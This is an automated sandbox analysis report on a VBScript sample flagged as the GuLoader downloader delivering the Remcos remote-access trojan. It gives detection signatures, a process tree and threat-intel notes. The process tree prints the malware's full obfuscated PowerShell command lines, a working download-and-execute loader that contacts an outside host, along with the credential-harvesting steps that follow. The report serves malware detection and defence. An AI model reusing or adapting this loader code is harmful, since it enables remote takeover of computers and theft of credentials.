Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SOA.vbs

Overview

General Information

Sample name:SOA.vbs
Analysis ID:1465862
MD5:67e1e122a412c456946e5206247a92eb
SHA1:7262d0ebf405ce41c1000d6e3940099cdb0b8e4b
SHA256:68796e148be21fcce665281ce32941c6be58028befb85b7789253dfde8d9e68e
Tags:GuLoaderRATRemcosRATvbs
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 768 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3516 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteerlidKonomi. Arkivk/StoreslcInsu pa Futur m$MessersBBaghaano,innaclmIndeterbSkolegaeStikkess Hopkint .oktoroPatchi pUtilregp,amsinge Dispost arinasenkelhe)Dibutyr ');Illish (fyrstendmme 'Smoking$ Re,ultgPhosph.lOutswiroCyclusgbvalenceaNo,dendlM cetoz: Bru erCagonisei S.ddelrNsevrdis LavfalisemitertFor.ftehIndkoms2 Produk0Sommerf0Renteko=Uprcise$DebentuB MormoneDronninsSynkrospSnubbisa Driv ukRadioake Aquavi.RacistesBurblinpGront elFlor.neiCha.aeptUspoken(Frstega$E.ectroDMolervreMartelbuMa.ionetSandeleoinconsuxMiljstti Madpakd kudenseUdbryde) Chaper ');Illish (fyrstendmme 'Bestraa[Se tienNVentilee Inspirt Pedime.Rr,lsevS Br.steeIndbyggrCitificvS.umkvaiAr,ejdscV,nvitteRicinelPKoleriko tndstii U.opian SutrastNormeriM,ekapitaFangernnFirmamraNephrodgAnisbole sammenr C,rkel]Snea,in: Totali:Mo finiS TytheieAmac atcTektit.uG ossopr TelestiD ellintMikraesyRefri ePUerholdrPaucispoHapsendtirrepaioPalatogc T.berioMorgenpl,atarbf Ma.ning=Bernetk Entire[ PotensNLangspyeOpfindetFromber.Jugeme,SSrkendeeSmaaforc TilsaeuCorindorBroka.ei Ilde ttOver,lyyLati,skPClive,er,orlagsoScattert Misinfohav,nenc Gledesokr.nragl ,lhambTPersienybottonhpNe rusteEpigram]Grundfl:Pi fleo:FarveskTRegnskalAutomo sSpaniol1Ddsstra2Hearts ');$Bespake=$Cirsith200[0];$Retransfigure= (fyrstendmme 'Afvundn$PrefrozgPreswall.undhedoMover.sbHyperalaUdbedrel In.fly:Rep.ginNXiphioiaSvovlagtLogfilesSma,lmikFreckpaiBeta,kef Lasca tSub endeAlarman=RechallN ,armoneRevurd,wLarrupe-Ex,itesOSynkfrdbMul,iapjBe rifteRegnskac.ackscatkarvesp IndefinSQuintupyBefi tes Flunk t Blemosefeazi gmVi.rlin. kalebsNselvlrteGldspostS ndpil.FelicitWYeasttiebedreafbWikenocCNongenulNoemataiGr.msereRe.ucernRatheant');$Retransfigure+=$Debater[1];Illish ($Retransfigure);Illish (fyrstendmme ' cypres$AromastNMidtpuna Sl,tdit KildetsDedicatk godskriFidsforfzees irt Prythee erg no.spraintHDeproceeBrandhra N,ughtdFelt ave.rthroprOverskus Imper,[Krigsst$ Dej soS .abrapoPrd.katrRusk rstsknsomteFlagitarPeripapifantasinFordoblgFourageeAmiglobn Thubans Sorted]Caremep=Hybridi$C llyinOSlipbanpIngel shAdrenaloPin.ettlSclaffed ScutulsDesiders Bes.fttre olubuAdvenaeeTrkkernrVegetatn.edsageeMasseresRamning ');$Tragacanthin=fyrstendmme 'Dagpeng$StemmebNSportsiaFrstevitHypnogesLadysnok edelseiUnplurafoejnenetElsassieHawkbil.ValentiD NarcotoHoveds,wMarksmanWorrieclAb,liceoSig,ejnaRecitemdMediterFSkandkki oncordl Slu bee sportd(G gossa$Asse aiB igismemisanths Roke.ip Hubbuba .usenekLaniereeU kyldf,Nglenpi$TredeltU Nonspeh Efte,sjFr.madslL.linespBoltesfeTilbag.lAkantusiPleone gUnderrusSterilitAlko,eseR.dicol)L antag ';$Uhjlpeligste=$Debater[0];Illish (fyrstendmme 'p rtesp$Whamb egWhippetlDiaspidoAntabusbAparthea Apsidcl Heli,p:OotocoiKUnratior UforskiEgernelmGymnonoiCand lanAnmodenaIm ropelDi.featiDusine sFilologtAnderumiKkkenmascymbocekExcoriaeK ralla=Smoulde(DarkerpTVichamoeCalcul,sMagnetotBehften- B.mandPBiomagnaSkrunint.ulekalh V gest Ha,ties$ce.tralUMadannohStteskij Ladyisl Ry kerpRecedeveMetapsylRadbrkkiS,ipulagLillepusdemyelitArbejdse Kom.ro)Diament ');while (!$Kriminalistiske) {Illish (fyrstendmme 'Forn.te$G sandtg IncitolAnstil oAstronab Laanena Galoppluhjlpso:O.nsgraUPlanfuldOdinitilFyraftebAustromsanko strTroug.seWhoreman InddtedRenommveSpasmag= Albain$LydinfotAnkeinsrAabninguDroemmee Carlse ') ;Illish $Tragacanthin;Illish (fyrstendmme 'UnpurifSBestykntOu.givea rundkurAspid.btBybudep-MnemoteSGarbsbel,aischaeFarfarseGadeuorpthermo, Unana y4Dativob ');Illish (fyrstendmme 'Udve.sl$Bul,endg rthantl B,arhioAntimetb ,ackveaEremuril Depres: ravestK RkebisrJulemrkiHalefjemNedg,aviSki.engnForsk.easubsphelSeign,oiSpectr sHasardatp,ognosiBeskedes SuspenkCompassestanisl=Sortb s(Overst,T UnsopheSigtelisBistadetWagoner-U,gangsPVa gneta SlumretTies.ethhenvejr Plkkene$Sj sstyU gtenhehBjennatjPracticlFyrfad,pAf.raadePhenazilFilinfoiUn.upergIndivids UnmythtSkraakaeNihili,)Eksport ') ;Illish (fyrstendmme 'donnaen$spytki.glymphotlRecip,ooNeptunebFashiouaExcellelApproks:Euorthos .udevoi TmmerflCiboltrv ,nbrute con,eyr BrdskrrSprinteoAt.ainedJernind=Banovin$Petitiog Skivebl LeekbuoModes gbKnhjtroaBankboglFli,esu:No,inerA ConsopsIndstnisMedansviDishingmtridermiSuggestlC,elatoeUngtelirKlientpi Dak,ylnunhelefgBemuzz.s,ammens+,critud+Dis,rra%Enbus.h$ ActinoC.kspresiVesttysr UnhabisHyldeb,iP.chydetUnlive h S nsto2Dyrekl.0 Tapets0 Ljetgo.B drvelcChloro,o AccorduDiskettn HjuledtOl ebil ') ;$Bespake=$Cirsith200[$silverrod];}$Lysimeters=302269;$Descantist115=28958;Illish (fyrstendmme 'Alfanum$ AforetgFlor.uklIndl nioF briksbophvelsaEnt rozlDomesti:AccustoTFama.ourgrydereo.hitiesmPerversmSjaler,eOrometrsilinasiaEivinkolTophscosRetsl.km Laase.aLonesoml BuffooeKaloprirManicuri chaira Datast=Obligat MellemhGlejesveehaineprtDiazino- Bi,lioCProconvoUnfoun nHomoeottBan voleBrai.wonRenkultt debora Astr.am$ Uns ufU C,bbaghEntrailjHoarseslAbra ampIndtrree afstemlPhotogriCh.ntzigIrratios Bar.artDrumloieEjendom ');Illish (fyrstendmme ' Byguer$Illustrg In,iollEmotionoSters,ybUdarm taUndergrlOveratt:BejewelSSt.llbipPosteksuBegitnimEndimeniStrningnTetran.g Upgang honekal= Remine Routous[Bi.peviSUdskamnySttterns FusiletGreenlae VestprmPei,eds.p stiesCDeputatoSidd,isnNeure.tv PatrioeB,rgravrFedderot E.eabl]Wallowi:B echan:Co,tipuFMellem,rCoursh.o P dikam GttevrBTungsinaP rsongsGrnsesfeBedownb6 B neps4PunitioS ParadotOutputfr Vandvai PlesionBilledvg Sa,cha(Ov.gene$sportelTStjfrierSystemboOldkirkmTrompetm erugineForbr rsappelsiaFatuit,lVendepusVandlovmOpkoblia NumberlExocr.nePri,ecorSjlehaliCouvade)Lnprobl ');Illish (fyrstendmme ' .iljkr$KubaanagKlorerelBasisbooAab.nthb M gacyaPreelecl Konc,r:AllotriJDistriboTrforaru Ch,kerrT.rarulnTetr,kiaSorterfl ,mplumnPopglovuG,ootysmForesprmUndissueOprenserExecrateBilliggtFiksere Jo dtil=Neutral Refract[SkruetrSOceanfryPejlekos irginatArchaeoef jeblam Design.AfmalenTSoodlete indkasx itziat Feoff..DokumenEUdka tnn C.nodicDe,eteroDe.enerd djustii ZonelonReperf g antime]Domsafs:Immodes:PlaceriAAmbite,SRa.hideC SkulpeIFremmedIRamrodd.Publi.eGMunkekueDahoo.stZonit dSToluidstOctileursemieggiNovelisnbl ndingAtre at( Amygda$SkovlvoSLactescpServituuAnnoncemBrugereiUncalornUnplundg Predet)Ma,dsmo ');Illish (fyrstendmme 'Beatega$AffinitgUdmaalal mningsoSquirkubHypobasaSkotjsalActualn:EsserslG GnetumesolsejlnKabine.ndizorgae StandemMonobuts ildfasiSpeci.lgOmentostFetereniYngelplgFestkl.t,ugerma=Bu,ging$ RaaklaJbov.endoBrugerku.uckerirNitterenKommu,iaSeapooslMlkevejnBoligblu U.estem ensnarmRegisteekatiposr.lvsnoreTrigamitMerchan.T bulaesBitniveu Maran bCharleys,issiontLysre urAfbarkeiSchatt.n,etrolag .iquor(Gonobla$CirculiLVe blesyFadervosLucin,ci Orifacm AnaceseUndlivetGen emseTilgr nrYv,rfics Omnipr,Sh,rrie$NaologiD La,ineeU,fladnsInelastcOpsatseaForholdnProkurat RecarbirussecosUnderkat Observ1 Massep1Betterg5S ovene)e sinfe ');Illish $Gennemsigtigt;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3496 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dobbeltrudens140.Aff && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 5512 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteerlidKonomi. Arkivk/StoreslcInsu pa Futur m$MessersBBaghaano,innaclmIndeterbSkolegaeStikkess Hopkint .oktoroPatchi pUtilregp,amsinge Dispost arinasenkelhe)Dibutyr ');Illish (fyrstendmme 'Smoking$ Re,ultgPhosph.lOutswiroCyclusgbvalenceaNo,dendlM cetoz: Bru erCagonisei S.ddelrNsevrdis LavfalisemitertFor.ftehIndkoms2 Produk0Sommerf0Renteko=Uprcise$DebentuB MormoneDronninsSynkrospSnubbisa Driv ukRadioake Aquavi.RacistesBurblinpGront elFlor.neiCha.aeptUspoken(Frstega$E.ectroDMolervreMartelbuMa.ionetSandeleoinconsuxMiljstti Madpakd kudenseUdbryde) Chaper ');Illish (fyrstendmme 'Bestraa[Se tienNVentilee Inspirt Pedime.Rr,lsevS Br.steeIndbyggrCitificvS.umkvaiAr,ejdscV,nvitteRicinelPKoleriko tndstii U.opian SutrastNormeriM,ekapitaFangernnFirmamraNephrodgAnisbole sammenr C,rkel]Snea,in: Totali:Mo finiS TytheieAmac atcTektit.uG ossopr TelestiD ellintMikraesyRefri ePUerholdrPaucispoHapsendtirrepaioPalatogc T.berioMorgenpl,atarbf Ma.ning=Bernetk Entire[ PotensNLangspyeOpfindetFromber.Jugeme,SSrkendeeSmaaforc TilsaeuCorindorBroka.ei Ilde ttOver,lyyLati,skPClive,er,orlagsoScattert Misinfohav,nenc Gledesokr.nragl ,lhambTPersienybottonhpNe rusteEpigram]Grundfl:Pi fleo:FarveskTRegnskalAutomo sSpaniol1Ddsstra2Hearts ');$Bespake=$Cirsith200[0];$Retransfigure= (fyrstendmme 'Afvundn$PrefrozgPreswall.undhedoMover.sbHyperalaUdbedrel In.fly:Rep.ginNXiphioiaSvovlagtLogfilesSma,lmikFreckpaiBeta,kef Lasca tSub endeAlarman=RechallN ,armoneRevurd,wLarrupe-Ex,itesOSynkfrdbMul,iapjBe rifteRegnskac.ackscatkarvesp IndefinSQuintupyBefi tes Flunk t Blemosefeazi gmVi.rlin. kalebsNselvlrteGldspostS ndpil.FelicitWYeasttiebedreafbWikenocCNongenulNoemataiGr.msereRe.ucernRatheant');$Retransfigure+=$Debater[1];Illish ($Retransfigure);Illish (fyrstendmme ' cypres$AromastNMidtpuna Sl,tdit KildetsDedicatk godskriFidsforfzees irt Prythee erg no.spraintHDeproceeBrandhra N,ughtdFelt ave.rthroprOverskus Imper,[Krigsst$ Dej soS .abrapoPrd.katrRusk rstsknsomteFlagitarPeripapifantasinFordoblgFourageeAmiglobn Thubans Sorted]Caremep=Hybridi$C llyinOSlipbanpIngel shAdrenaloPin.ettlSclaffed ScutulsDesiders Bes.fttre olubuAdvenaeeTrkkernrVegetatn.edsageeMasseresRamning ');$Tragacanthin=fyrstendmme 'Dagpeng$StemmebNSportsiaFrstevitHypnogesLadysnok edelseiUnplurafoejnenetElsassieHawkbil.ValentiD NarcotoHoveds,wMarksmanWorrieclAb,liceoSig,ejnaRecitemdMediterFSkandkki oncordl Slu bee sportd(G gossa$Asse aiB igismemisanths Roke.ip Hubbuba .usenekLaniereeU kyldf,Nglenpi$TredeltU Nonspeh Efte,sjFr.madslL.linespBoltesfeTilbag.lAkantusiPleone gUnderrusSterilitAlko,eseR.dicol)L antag ';$Uhjlpeligste=$Debater[0];Illish (fyrstendmme 'p rtesp$Whamb egWhippetlDiaspidoAntabusbAparthea Apsidcl Heli,p:OotocoiKUnratior UforskiEgernelmGymnonoiCand lanAnmodenaIm ropelDi.featiDusine sFilologtAnderumiKkkenmascymbocekExcoriaeK ralla=Smoulde(DarkerpTVichamoeCalcul,sMagnetotBehften- B.mandPBiomagnaSkrunint.ulekalh V gest Ha,ties$ce.tralUMadannohStteskij Ladyisl Ry kerpRecedeveMetapsylRadbrkkiS,ipulagLillepusdemyelitArbejdse Kom.ro)Diament ');while (!$Kriminalistiske) {Illish (fyrstendmme 'Forn.te$G sandtg IncitolAnstil oAstronab Laanena Galoppluhjlpso:O.nsgraUPlanfuldOdinitilFyraftebAustromsanko strTroug.seWhoreman InddtedRenommveSpasmag= Albain$LydinfotAnkeinsrAabninguDroemmee Carlse ') ;Illish $Tragacanthin;Illish (fyrstendmme 'UnpurifSBestykntOu.givea rundkurAspid.btBybudep-MnemoteSGarbsbel,aischaeFarfarseGadeuorpthermo, Unana y4Dativob ');Illish (fyrstendmme 'Udve.sl$Bul,endg rthantl B,arhioAntimetb ,ackveaEremuril Depres: ravestK RkebisrJulemrkiHalefjemNedg,aviSki.engnForsk.easubsphelSeign,oiSpectr sHasardatp,ognosiBeskedes SuspenkCompassestanisl=Sortb s(Overst,T UnsopheSigtelisBistadetWagoner-U,gangsPVa gneta SlumretTies.ethhenvejr Plkkene$Sj sstyU gtenhehBjennatjPracticlFyrfad,pAf.raadePhenazilFilinfoiUn.upergIndivids UnmythtSkraakaeNihili,)Eksport ') ;Illish (fyrstendmme 'donnaen$spytki.glymphotlRecip,ooNeptunebFashiouaExcellelApproks:Euorthos .udevoi TmmerflCiboltrv ,nbrute con,eyr BrdskrrSprinteoAt.ainedJernind=Banovin$Petitiog Skivebl LeekbuoModes gbKnhjtroaBankboglFli,esu:No,inerA ConsopsIndstnisMedansviDishingmtridermiSuggestlC,elatoeUngtelirKlientpi Dak,ylnunhelefgBemuzz.s,ammens+,critud+Dis,rra%Enbus.h$ ActinoC.kspresiVesttysr UnhabisHyldeb,iP.chydetUnlive h S nsto2Dyrekl.0 Tapets0 Ljetgo.B drvelcChloro,o AccorduDiskettn HjuledtOl ebil ') ;$Bespake=$Cirsith200[$silverrod];}$Lysimeters=302269;$Descantist115=28958;Illish (fyrstendmme 'Alfanum$ AforetgFlor.uklIndl nioF briksbophvelsaEnt rozlDomesti:AccustoTFama.ourgrydereo.hitiesmPerversmSjaler,eOrometrsilinasiaEivinkolTophscosRetsl.km Laase.aLonesoml BuffooeKaloprirManicuri chaira Datast=Obligat MellemhGlejesveehaineprtDiazino- Bi,lioCProconvoUnfoun nHomoeottBan voleBrai.wonRenkultt debora Astr.am$ Uns ufU C,bbaghEntrailjHoarseslAbra ampIndtrree afstemlPhotogriCh.ntzigIrratios Bar.artDrumloieEjendom ');Illish (fyrstendmme ' Byguer$Illustrg In,iollEmotionoSters,ybUdarm taUndergrlOveratt:BejewelSSt.llbipPosteksuBegitnimEndimeniStrningnTetran.g Upgang honekal= Remine Routous[Bi.peviSUdskamnySttterns FusiletGreenlae VestprmPei,eds.p stiesCDeputatoSidd,isnNeure.tv PatrioeB,rgravrFedderot E.eabl]Wallowi:B echan:Co,tipuFMellem,rCoursh.o P dikam GttevrBTungsinaP rsongsGrnsesfeBedownb6 B neps4PunitioS ParadotOutputfr Vandvai PlesionBilledvg Sa,cha(Ov.gene$sportelTStjfrierSystemboOldkirkmTrompetm erugineForbr rsappelsiaFatuit,lVendepusVandlovmOpkoblia NumberlExocr.nePri,ecorSjlehaliCouvade)Lnprobl ');Illish (fyrstendmme ' .iljkr$KubaanagKlorerelBasisbooAab.nthb M gacyaPreelecl Konc,r:AllotriJDistriboTrforaru Ch,kerrT.rarulnTetr,kiaSorterfl ,mplumnPopglovuG,ootysmForesprmUndissueOprenserExecrateBilliggtFiksere Jo dtil=Neutral Refract[SkruetrSOceanfryPejlekos irginatArchaeoef jeblam Design.AfmalenTSoodlete indkasx itziat Feoff..DokumenEUdka tnn C.nodicDe,eteroDe.enerd djustii ZonelonReperf g antime]Domsafs:Immodes:PlaceriAAmbite,SRa.hideC SkulpeIFremmedIRamrodd.Publi.eGMunkekueDahoo.stZonit dSToluidstOctileursemieggiNovelisnbl ndingAtre at( Amygda$SkovlvoSLactescpServituuAnnoncemBrugereiUncalornUnplundg Predet)Ma,dsmo ');Illish (fyrstendmme 'Beatega$AffinitgUdmaalal mningsoSquirkubHypobasaSkotjsalActualn:EsserslG GnetumesolsejlnKabine.ndizorgae StandemMonobuts ildfasiSpeci.lgOmentostFetereniYngelplgFestkl.t,ugerma=Bu,ging$ RaaklaJbov.endoBrugerku.uckerirNitterenKommu,iaSeapooslMlkevejnBoligblu U.estem ensnarmRegisteekatiposr.lvsnoreTrigamitMerchan.T bulaesBitniveu Maran bCharleys,issiontLysre urAfbarkeiSchatt.n,etrolag .iquor(Gonobla$CirculiLVe blesyFadervosLucin,ci Orifacm AnaceseUndlivetGen emseTilgr nrYv,rfics Omnipr,Sh,rrie$NaologiD La,ineeU,fladnsInelastcOpsatseaForholdnProkurat RecarbirussecosUnderkat Observ1 Massep1Betterg5S ovene)e sinfe ');Illish $Gennemsigtigt;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 2724 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dobbeltrudens140.Aff && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 1096 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • conhost.exe (PID: 6112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wab.exe (PID: 5008 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xmgittpzhob" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 5060 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iglbtlabvwtooe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 6116 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\kiztuekujelbqlwip" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

